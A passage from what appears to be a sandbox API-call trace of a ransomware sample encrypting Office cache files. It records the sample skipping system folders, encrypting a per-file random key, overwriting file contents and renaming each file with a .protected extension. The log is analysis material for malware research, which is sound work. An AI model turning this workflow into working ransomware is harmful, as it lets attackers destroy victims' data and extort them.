Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0063.633] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0063.633] StrStrW (lpFirst="Office32WW.xml", lpSrch=".txt") returned 0x0 [0063.633] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0063.633] StrStrW (lpFirst="Office32WW.xml", lpSrch=".rar") returned 0x0 [0063.633] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0063.633] StrStrW (lpFirst="Office32WW.xml", lpSrch=".zip") returned 0x0 [0063.633] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x10b2, lpOverlapped=0x0) returned 1 [0063.644] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffef4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.645] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x10b2, lpOverlapped=0x0) returned 1 [0063.645] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.645] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.645] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.645] CloseHandle (hObject=0xb4) returned 1 [0063.646] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.protected") returned 91 [0063.646] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.protected")) returned 1 [0063.646] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.646] lstrcmpiW (lpString1="ose.exe", lpString2="Windows") returned -1 [0063.646] lstrcmpiW (lpString1="ose.exe", lpString2="Program Files") returned -1 [0063.646] lstrcmpiW (lpString1="ose.exe", lpString2="Program Files (x86)") returned -1 [0063.646] lstrcmpiW (lpString1="ose.exe", lpString2="$Recycle.bin") returned 1 [0063.646] lstrcmpiW (lpString1="ose.exe", lpString2="System Volume Information") returned -1 [0063.646] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0063.646] StrStrIW (lpFirst="ose.exe", lpSrch=".protected") returned 0x0 [0063.646] lstrcmpW (lpString1="ose.exe", lpString2="RESTORE_FILES.txt") returned -1 [0063.646] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.646] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.646] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0063.651] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0063.651] StrStrW (lpFirst="ose.exe", lpSrch=".txt") returned 0x0 [0063.651] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0063.651] StrStrW (lpFirst="ose.exe", lpSrch=".rar") returned 0x0 [0063.651] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0063.651] StrStrW (lpFirst="ose.exe", lpSrch=".zip") returned 0x0 [0063.651] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.672] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.672] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.672] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.672] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.680] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.680] CloseHandle (hObject=0xb4) returned 1 [0063.680] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.protected") returned 84 [0063.685] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.protected")) returned 1 [0063.686] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.686] lstrcmpiW (lpString1="osetup.dll", lpString2="Windows") returned -1 [0063.686] lstrcmpiW (lpString1="osetup.dll", lpString2="Program Files") returned -1 [0063.686] lstrcmpiW (lpString1="osetup.dll", lpString2="Program Files (x86)") returned -1 [0063.686] lstrcmpiW (lpString1="osetup.dll", lpString2="$Recycle.bin") returned 1 [0063.686] lstrcmpiW (lpString1="osetup.dll", lpString2="System Volume Information") returned -1 [0063.686] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0063.686] StrStrIW (lpFirst="osetup.dll", lpSrch=".protected") returned 0x0 [0063.686] lstrcmpW (lpString1="osetup.dll", lpString2="RESTORE_FILES.txt") returned -1 [0063.686] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.686] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.686] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0063.687] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0063.687] StrStrW (lpFirst="osetup.dll", lpSrch=".txt") returned 0x0 [0063.687] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0063.687] StrStrW (lpFirst="osetup.dll", lpSrch=".rar") returned 0x0 [0063.687] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0063.687] StrStrW (lpFirst="osetup.dll", lpSrch=".zip") returned 0x0 [0063.688] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.915] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.915] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.915] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.916] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.049] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.049] CloseHandle (hObject=0xb4) returned 1 [0064.049] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.protected") returned 87 [0064.049] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.protected")) returned 1 [0064.050] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.050] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Windows") returned -1 [0064.050] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Program Files") returned -1 [0064.050] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Program Files (x86)") returned -1 [0064.050] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="$Recycle.bin") returned 1 [0064.050] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="System Volume Information") returned -1 [0064.050] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0064.050] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".protected") returned 0x0 [0064.050] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="RESTORE_FILES.txt") returned -1 [0064.050] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.050] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.050] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.050] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0064.050] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".txt") returned 0x0 [0064.050] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0064.050] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".rar") returned 0x0 [0064.050] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0064.050] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".zip") returned 0x0 [0064.050] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.060] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.060] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.061] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.062] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.079] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.079] CloseHandle (hObject=0xb4) returned 1 [0064.080] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.protected") returned 89 [0064.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.protected")) returned 1 [0064.080] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.080] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Windows") returned -1 [0064.081] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Program Files") returned -1 [0064.081] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Program Files (x86)") returned -1 [0064.081] lstrcmpiW (lpString1="PidGenX.dll", lpString2="$Recycle.bin") returned 1 [0064.081] lstrcmpiW (lpString1="PidGenX.dll", lpString2="System Volume Information") returned -1 [0064.081] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0064.081] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".protected") returned 0x0 [0064.081] lstrcmpW (lpString1="PidGenX.dll", lpString2="RESTORE_FILES.txt") returned -1 [0064.081] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.081] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.081] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.081] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0064.081] StrStrW (lpFirst="PidGenX.dll", lpSrch=".txt") returned 0x0 [0064.081] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0064.081] StrStrW (lpFirst="PidGenX.dll", lpSrch=".rar") returned 0x0 [0064.081] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0064.081] StrStrW (lpFirst="PidGenX.dll", lpSrch=".zip") returned 0x0 [0064.081] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.083] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.083] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.084] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.084] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.103] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.104] CloseHandle (hObject=0xb4) returned 1 [0064.104] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.protected") returned 88 [0064.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.protected")) returned 1 [0064.105] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.105] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0064.105] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Program Files") returned -1 [0064.105] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Program Files (x86)") returned -1 [0064.105] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$Recycle.bin") returned 1 [0064.105] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="System Volume Information") returned -1 [0064.105] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0064.105] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".protected") returned 0x0 [0064.105] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="RESTORE_FILES.txt") returned -1 [0064.105] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0064.105] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0064.105] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.106] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0064.106] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".txt") returned 0x0 [0064.106] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0064.106] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".rar") returned 0x0 [0064.106] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0064.106] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".zip") returned 0x0 [0064.106] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.120] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.120] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0064.121] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.121] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0064.137] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0064.137] CloseHandle (hObject=0xb4) returned 1 [0064.138] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.protected") returned 101 [0064.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.protected" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.protected")) returned 1 [0064.138] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.138] lstrcmpiW (lpString1="setup.exe", lpString2="Windows") returned -1 [0064.138] lstrcmpiW (lpString1="setup.exe", lpString2="Program Files") returned 1 [0064.138] lstrcmpiW (lpString1="setup.exe", lpString2="Program Files (x86)") returned 1 [0064.138] lstrcmpiW (lpString1="setup.exe", lpString2="$Recycle.bin") returned 1 [0064.138] lstrcmpiW (lpString1="setup.exe", lpString2="System Volume Information") returned -1 [0064.138] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0064.138] StrStrIW (lpFirst="setup.exe", lpSrch=".protected") returned 0x0 [0064.138] lstrcmpW (lpString1="setup.exe", lpString2="RESTORE_FILES.txt") returned 1 [0064.139] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 